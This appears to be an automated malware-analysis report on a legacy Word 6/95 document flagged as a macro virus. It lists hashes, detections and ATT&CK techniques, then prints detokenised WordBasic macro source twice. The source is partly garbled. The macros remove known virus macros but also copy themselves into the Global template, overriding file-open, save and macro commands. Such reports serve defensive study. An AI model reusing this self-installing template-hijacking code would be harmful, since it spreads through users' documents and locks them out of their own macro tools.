Office (OLE) malware analysis — malicious · ae8654f74ca374ea

MALICIOUS

Office (OLE)

14.0 KB First seen: 2012-06-14

MD5: e656a99096913a45d510198a8569d16a SHA-1: b890cc9c368e68fb76ae6a3fb170ce4c711bb75d SHA-256: ae8654f74ca374ea88461ad7ecd53627807b83fa6ea99c974de837d7a1d62720

122 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file contains legacy WordBasic macro virus markers and a heuristic indicating a lure to enable macros, suggesting it's designed to execute malicious code. The document body explicitly mentions 'RSN MACRO VIRUS Goat file' and includes VBA-like structures, pointing towards a macro-based attack. The ClamAV detection as 'Win.Trojan.Defender-1' further confirms its malicious nature.

Heuristics 4

ClamAV: Win.Trojan.Defender-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Defender-1
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE

The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 7172 bytes

Filename	Kind	Source	Size
`wordbasic_macros.txt`	wordbasic-macro	analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)	7172 bytes
SHA-256: `7dccb6e33778f6bfd30dc05d7db2a98d5a4fef78a320fe91f98bea828937a422`
Preview script First 1,000 lines of the extracted script = = = 12645 = 12901 357 = 13157 * , , 29797 , = 13413 = = = = MAIN , - * ErrHandler FoundVirus = 0 TellUser$ = " virus macro(s) have been detected and removed from the Global Template" REM Initialize Word settings @cmd01b1 , = 0 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 , = 1 iMacroCount = @cmd80b7 0 , 0 REM Search the Global Template for virus macros i = 1 iMacroCount @cmd80b8 i = "AAAZAO" eAAAZAO = 1 @cmd80b8 i = "AAAZFS" eAAAZFS = 1 @cmd80b8 i = "FilePrint" eFilePrint = 1 @cmd80b8 i = "FilePrintDefault" eFilePrintDefault = 1 @cmd80b8 i = "FileSave" eFileSave = 1 @cmd80b8 i = "CloseUpData" eCloseUpData = 1 @cmd80b8 i = "FileConvertText" eFileConvertText = 1 i 24933 eFileConvertText = 1 FoundVirus = FoundVirus = Clean "FileConvertText" eCloseUpData = 1 FoundVirus = FoundVirus = Clean "CloseUpData" eFilePrintDefault = 1 FoundVirus = FoundVirus = Clean "FilePrintDefault" eFilePrint = 1 FoundVirus = FoundVirus = Clean "FilePrint" eFileSave = 1 FoundVirus = FoundVirus = Clean "FileSave" eAAAZAO = 1 FoundVirus = FoundVirus = Clean "AAAZAO" eAAAZFS = 1 FoundVirus = FoundVirus = Clean "AAAZFS" REM ***************************************************************** 17516 iWW6IInstance = @cmd8006 @cmd814d "WW6Defender" sMe$ = @cmd8025 sMacro$ = sMe$ = ":Module1" @cmd80c2 sMacro$ , "Global:Module1" sMacro$ = sMe$ = ":Module2" @cmd80c2 sMacro$ , "Global:Module2" sMacro$ = sMe$ = ":Module2" @cmd80c2 sMacro$ , "Global:FileSaveAs" sMacro$ = sMe$ = ":Module3" @cmd80c2 sMacro$ , "Global:ToolsMacro" sMacro$ = sMe$ = ":Module4" @cmd80c2 sMacro$ , "Global:FileOpen" sMacro$ = sMe$ = ":Defend" @cmd80c2 sMacro$ , "Global:Defender" @cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1 REM ***************************************************************** REM Acknowledge user if Global Template is infected FoundVirus 0 NumberOfVirus$ = @cmd8007 FoundVirus TellUser$ = NumberOfVirus$ = TellUser$ @cmd802b TellUser$ , "Defender" , 64 * Done 29285 Err 53 @cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd80a2 * InstallDefender "Defender has been installed successfully" Clean Virus$ , - * ErrHandler Clean = 0 SourceName$ = @cmd818e Virus$ SourceName$ SourceName$ "Built In" @cmd00de , = SourceName$ , = Virus$ , = 3 Clean = 1 * InstallDefender 29285 Err = 53 @cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd80a2 MAIN REM FileSaveAs dlg @cmd0054 , - * Abort dlg dlg dlg = 0 dlg = 1 sMe$ = @cmd8025 sTMacro$ = sMe$ = ":AutoOpen" @cmd80c2 "Global:Module1" , sTMacro$ sTMacro$ = sMe$ = ":Module1" @cmd80c2 "Global:Module1" , sTMacro$ sTMacro$ = sMe$ = ":Module2" @cmd80c2 "Global:Module2" , sTMacro$ sTMacro$ = sMe$ = ":Module3" @cmd80c2 "Global:ToolsMacro" , sTMacro$ sTMacro$ = sMe$ = ":Module4" @cmd80c2 "Global:FileOpen" , sTMacro$ sTMacro$ = sMe$ = ":Defend" @cmd80c2 "Global:Defender" , sTMacro$ @cmd0054 dlg * Done Err 102 @cmd0054 dlg MAIN "Runs, creates, deletes, or revises a macro" , - * Abort @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 Password$ = "Password" Password$ = @cmd80b1 "Restricted area. Please Enter your password" , "Defender" , Password$ Password$ = @cmd8025 @cmd802b "Password incorrect. Access denied" , "Defender" , 16 * GetPassword dlg @cmd00d7 dlg dlg @cmd00d7 dlg REM (c) Cybec Pty Ltd 1996 REM Global:FileOpen macro REM Cleans every opened document infected with the WinWord.Concept virus MAIN dlg @cmd0050 , - * finish dlg dlg @cmd0050 dlg a$ = @cmd818e "AAAZAO" b$ = @cmd818e "AAAZFS" c$ = @cmd818e "PayLoad" a$ b$ c$ a$ = b$ a$ = c$ @cmd00de , = a$ , = "AAAZAO" , = 3 @cmd00de , = a$ , = "AAAZFS" , = 3 @cmd00de , = a$ , = "PayLoad" , = 3 @cmd00de , = a$ , = "AutoOpen" , = 3 @cmd802b "The document was infected with the WinWord.Concept virus." = @cmd8005 13 = "The virus has been removed." = @cmd8005 13 = "Please, quit this document without saving and open it again." , " VET for Word v.2.1 (c) 1995 CYBEC P/L " , 16 @cmd80a3 1 , 1 @cmd0053 MAIN , - * ErrHandler FoundVirus = 0 TellUser$ = " virus macro(s) have been detected and removed from the Global Template" REM Initialize Word settings @cmd01b1 , = 0 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 , = 1 iMacroCount = @cmd80b7 0 , 0 REM Search the Global Template for virus macros i = 1 iMacroCount @cmd80b8 i = "AAAZAO" eAAAZAO = 1 @cmd80b8 i = "AAAZFS" eAAAZFS = 1 @cmd80b8 i = "FilePrint" eFilePrint = 1 @cmd80b8 i = "FilePrintDefault" eFilePrintDefault = 1 @cmd80b8 i = "FileSave" eFileSave = 1 @cmd80b8 i = "CloseUpData" eCloseUpData = 1 @cmd80b8 i = "FileConvertText" eFileConvertText = 1 i 24933 eFileConvertText = 1 FoundVirus = FoundVirus = Clean "FileConvertText" eCloseUpData = 1 FoundVirus = FoundVirus = Clean "CloseUpData" eFilePrintDefault = 1 FoundVirus = FoundVirus = Clean "FilePrintDefault" eFilePrint = 1 FoundVirus = FoundVirus = Clean "FilePrint" eFileSave = 1 FoundVirus = FoundVirus = Clean "FileSave" eAAAZAO = 1 FoundVirus = FoundVirus = Clean "AAAZAO" eAAAZFS = 1 FoundVirus = FoundVirus = Clean "AAAZFS" REM ***************************************************************** 17516 iWW6IInstance = @cmd8006 @cmd814d "WW6Defender" sMe$ = @cmd8025 sMacro$ = sMe$ = ":Module1" @cmd80c2 sMacro$ , "Global:Module1" sMacro$ = sMe$ = ":Module2" @cmd80c2 sMacro$ , "Global:Module2" sMacro$ = sMe$ = ":Module2" @cmd80c2 sMacro$ , "Global:FileSaveAs" sMacro$ = sMe$ = ":Module3" @cmd80c2 sMacro$ , "Global:ToolsMacro" sMacro$ = sMe$ = ":Module4" @cmd80c2 sMacro$ , "Global:FileOpen" sMacro$ = sMe$ = ":Defend" @cmd80c2 sMacro$ , "Global:Defender" @cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1 REM ***************************************************************** REM Acknowledge user if Global Template is infected FoundVirus 0 NumberOfVirus$ = @cmd8007 FoundVirus TellUser$ = NumberOfVirus$ = TellUser$ @cmd802b TellUser$ , "Defender" , 64 * Done 29285 Err 53 @cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd80a2 * InstallDefender "Defender has been installed successfully" Clean Virus$ , - * ErrHandler Clean = 0 SourceName$ = @cmd818e Virus$ SourceName$ SourceName$ "Built In" @cmd00de , = SourceName$ , = Virus$ , = 3 Clean = 1 * InstallDefender 29285 Err = 53 @cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48 @cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0 @cmd80a2

SHA-256: 7dccb6e33778f6bfd30dc05d7db2a98d5a4fef78a320fe91f98bea828937a422

Preview script

First 1,000 lines of the extracted script

= = =
12645 =
12901          
        357 =
13157 * ,   ,  
29797 ,         =
13413 = = = =
MAIN
, - * ErrHandler
FoundVirus = 0
TellUser$ = " virus macro(s) have been detected and removed from the Global Template"
REM Initialize Word settings
@cmd01b1 , = 0
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 ,   = 1
iMacroCount = @cmd80b7 0 , 0
REM Search the Global Template for virus macros
i = 1 iMacroCount
@cmd80b8 i = "AAAZAO"
eAAAZAO = 1
@cmd80b8 i = "AAAZFS"
eAAAZFS = 1
@cmd80b8 i = "FilePrint"
eFilePrint = 1
@cmd80b8 i = "FilePrintDefault"
eFilePrintDefault = 1
@cmd80b8 i = "FileSave"
eFileSave = 1
@cmd80b8 i = "CloseUpData"
eCloseUpData = 1
@cmd80b8 i = "FileConvertText"
eFileConvertText = 1
i
24933
eFileConvertText = 1
FoundVirus = FoundVirus = Clean "FileConvertText"
eCloseUpData = 1
FoundVirus = FoundVirus = Clean "CloseUpData"
eFilePrintDefault = 1
FoundVirus = FoundVirus = Clean "FilePrintDefault"
eFilePrint = 1
FoundVirus = FoundVirus = Clean "FilePrint"
eFileSave = 1
FoundVirus = FoundVirus = Clean "FileSave"
eAAAZAO = 1
FoundVirus = FoundVirus = Clean "AAAZAO"
eAAAZFS = 1
FoundVirus = FoundVirus = Clean "AAAZFS"
REM ******************************************************************* 17516
iWW6IInstance = @cmd8006 @cmd814d "WW6Defender"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Module1"
@cmd80c2 sMacro$ , "Global:Module1"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:Module2"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = sMe$ = ":Module3"
@cmd80c2 sMacro$ , "Global:ToolsMacro"
sMacro$ = sMe$ = ":Module4"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = sMe$ = ":Defend"
@cmd80c2 sMacro$ , "Global:Defender"
@cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1
REM *******************************************************************	
REM Acknowledge user if Global Template is infected
FoundVirus 0
NumberOfVirus$ = @cmd8007 FoundVirus
TellUser$ = NumberOfVirus$ = TellUser$
@cmd802b TellUser$ , "Defender" , 64
* Done
29285
Err 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
* InstallDefender
"Defender has been installed successfully"
Clean Virus$
, - * ErrHandler
Clean = 0
SourceName$ = @cmd818e Virus$
SourceName$ SourceName$ "Built In"
@cmd00de , = SourceName$ , = Virus$ , = 3
Clean = 1
  * InstallDefender
29285
Err = 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
MAIN
REM FileSaveAs 
dlg @cmd0054
, - * Abort
dlg
dlg
dlg = 0 dlg = 1
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:Module1" , sTMacro$
sTMacro$ = sMe$ = ":Module1"
@cmd80c2 "Global:Module1" , sTMacro$
sTMacro$ = sMe$ = ":Module2"
@cmd80c2 "Global:Module2" , sTMacro$
sTMacro$ = sMe$ = ":Module3"
@cmd80c2 "Global:ToolsMacro" , sTMacro$
sTMacro$ = sMe$ = ":Module4"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = sMe$ = ":Defend"
@cmd80c2 "Global:Defender" , sTMacro$
@cmd0054 dlg
* Done
Err 102
@cmd0054 dlg
MAIN
"Runs, creates, deletes, or revises a macro"
, - * Abort
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
Password$ = "Password"
Password$ = @cmd80b1 "Restricted area. Please Enter your password" , "Defender" , Password$
Password$ = @cmd8025
@cmd802b "Password incorrect. Access denied" , "Defender" , 16
* GetPassword
dlg @cmd00d7
dlg
dlg
@cmd00d7 dlg
REM  (c) Cybec Pty Ltd 1996
REM  Global:FileOpen macro
REM  Cleans every opened document infected with the WinWord.Concept virus
MAIN
dlg @cmd0050
, - * finish
dlg
dlg
@cmd0050 dlg
a$ = @cmd818e "AAAZAO"
b$ = @cmd818e "AAAZFS"
c$ = @cmd818e "PayLoad"
a$ b$ c$ a$ = b$ a$ = c$
@cmd00de , = a$ , = "AAAZAO" , = 3
@cmd00de , = a$ , = "AAAZFS" , = 3
@cmd00de , = a$ , = "PayLoad" , = 3
@cmd00de , = a$ , = "AutoOpen" , = 3
@cmd802b "The document was infected with the WinWord.Concept virus." = @cmd8005 13 = "The virus has been removed." = @cmd8005 13 = "Please, quit this document without saving and open it again." , " VET for Word v.2.1        (c) 1995 CYBEC P/L " , 16
@cmd80a3 1 , 1
@cmd0053
MAIN
, - * ErrHandler
FoundVirus = 0
TellUser$ = " virus macro(s) have been detected and removed from the Global Template"
REM Initialize Word settings
@cmd01b1 , = 0
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd00cb = 1 , = 0 , = 0 , = 0 , = 1 , = 1 , + = 1 , = 1 , = 0 , = , = 1 ,   = 1
iMacroCount = @cmd80b7 0 , 0
REM Search the Global Template for virus macros
i = 1 iMacroCount
@cmd80b8 i = "AAAZAO"
eAAAZAO = 1
@cmd80b8 i = "AAAZFS"
eAAAZFS = 1
@cmd80b8 i = "FilePrint"
eFilePrint = 1
@cmd80b8 i = "FilePrintDefault"
eFilePrintDefault = 1
@cmd80b8 i = "FileSave"
eFileSave = 1
@cmd80b8 i = "CloseUpData"
eCloseUpData = 1
@cmd80b8 i = "FileConvertText"
eFileConvertText = 1
i
24933
eFileConvertText = 1
FoundVirus = FoundVirus = Clean "FileConvertText"
eCloseUpData = 1
FoundVirus = FoundVirus = Clean "CloseUpData"
eFilePrintDefault = 1
FoundVirus = FoundVirus = Clean "FilePrintDefault"
eFilePrint = 1
FoundVirus = FoundVirus = Clean "FilePrint"
eFileSave = 1
FoundVirus = FoundVirus = Clean "FileSave"
eAAAZAO = 1
FoundVirus = FoundVirus = Clean "AAAZAO"
eAAAZFS = 1
FoundVirus = FoundVirus = Clean "AAAZFS"
REM ******************************************************************* 17516
iWW6IInstance = @cmd8006 @cmd814d "WW6Defender"
sMe$ = @cmd8025
sMacro$ = sMe$ = ":Module1"
@cmd80c2 sMacro$ , "Global:Module1"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:Module2"
sMacro$ = sMe$ = ":Module2"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = sMe$ = ":Module3"
@cmd80c2 sMacro$ , "Global:ToolsMacro"
sMacro$ = sMe$ = ":Module4"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = sMe$ = ":Defend"
@cmd80c2 sMacro$ , "Global:Defender"
@cmd8046 "WW6I" , @cmd8007 iWW6IInstance = 1
REM *******************************************************************	
REM Acknowledge user if Global Template is infected
FoundVirus 0
NumberOfVirus$ = @cmd8007 FoundVirus
TellUser$ = NumberOfVirus$ = TellUser$
@cmd802b TellUser$ , "Defender" , 64
* Done
29285
Err 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2
* InstallDefender
"Defender has been installed successfully"
Clean Virus$
, - * ErrHandler
Clean = 0
SourceName$ = @cmd818e Virus$
SourceName$ SourceName$ "Built In"
@cmd00de , = SourceName$ , = Virus$ , = 3
Clean = 1
  * InstallDefender
29285
Err = 53
@cmd802b "WARNING: Active macro virus found. Defender will now exit Word. You must then restart Word and try to load the document again" , "Defender" , 48
@cmd00d1 = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "7" , = , = , = 0
@cmd80a2

Open this report in the interactive analyzer, or submit your own file for analysis.